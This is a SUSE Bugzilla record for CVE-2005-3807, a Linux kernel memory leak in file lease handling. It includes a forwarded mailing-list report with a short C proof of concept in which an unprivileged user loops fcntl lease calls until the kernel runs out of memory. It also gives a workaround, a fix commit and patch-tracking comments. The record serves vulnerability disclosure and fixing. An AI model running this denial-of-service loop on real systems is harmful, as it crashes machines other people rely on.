Bugzilla – Bug 133803
VUL-0: CVE-2005-3807: kernel: file leases lead to oom
Last modified: 2021-12-06 12:15:52 UTC
We received the following report via vendor-sec. The issue is public. Date: Mon, 14 Nov 2005 10:43:29 -0800 From: Chris Wright <chrisw@osdl.org> To: vendor-sec@lst.de Subject: [vendor-sec] [avi@argo.co.il: local denial-of-service with file leases] Memory leak easily triggered by normal samba usage. Fix: http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff_plain;h=dc15ae14e97ee9d5ed740cbb0b94996076d8b37e;hp=9e6c67fd2716720d9029d38ea25884efcfdedeb6 thanks, -chris ----- Forwarded message from Avi Kivity <avi@argo.co.il> ----- Date: Thu, 10 Nov 2005 19:00:46 +0200 From: Avi Kivity <avi@argo.co.il> To: linux-kernel <linux-kernel@vger.kernel.org> Subject: local denial-of-service with file leases User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc4 (X11/20050929) the following program will oom a the 2.6.14.1 kernel, running as an ordinary user: #include <unistd.h> #include <stdlib.h> #include <linux/fcntl.h> int main(int ac, char **av) { char *fname = av[0]; int fd = open(fname, O_RDONLY); int r; while (1) { r = fcntl(fd, F_SETLEASE, F_RDLCK); if (r == -1) { perror("F_SETLEASE, F_RDLCK"); exit(1); } r = fcntl(fd, F_SETLEASE, F_UNLCK); if (r == -1) { perror("F_SETLEASE, F_UNLCK"); exit(1); } } return 0; } it will suck all available memory into fasync_cache, causing an oom. a workaround is to set fs.leases-enable to 0. this has already been reported to lkml[1] and fedora[2], with no effect. [1] http://www.ussg.iu.edu/hypermail/linux/kernel/0510.2/1589.html [2] https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=172691 - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ ----- End forwarded message ----- _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec
Ludwig, is it enough to fix this bug for HEAD?
Well, if "normal" (ie not even malicious) samba usage can kill your shiny suse linux server I vote for fixing it in all affected kernels.
SLES9, SL92 are _not_ affected. Committed to SL93, SL100, HEAD.
====================================================== Name: CVE-2005-3807 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3807 Reference: CONFIRM:http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=dc15ae14e97ee9d5ed740cbb0b94996076d8b37e Memory leak in the VFS file lease handling in locks.c in Linux kernels 2.6.10 to 2.6.15 allows local users to cause a denial of service (memory exhaustion) via certain Samba activities that cause an fasync entry to be re-allocated after the fasync queue has already been cleaned.
CVE-2005-3807: CVSS v2 Base Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)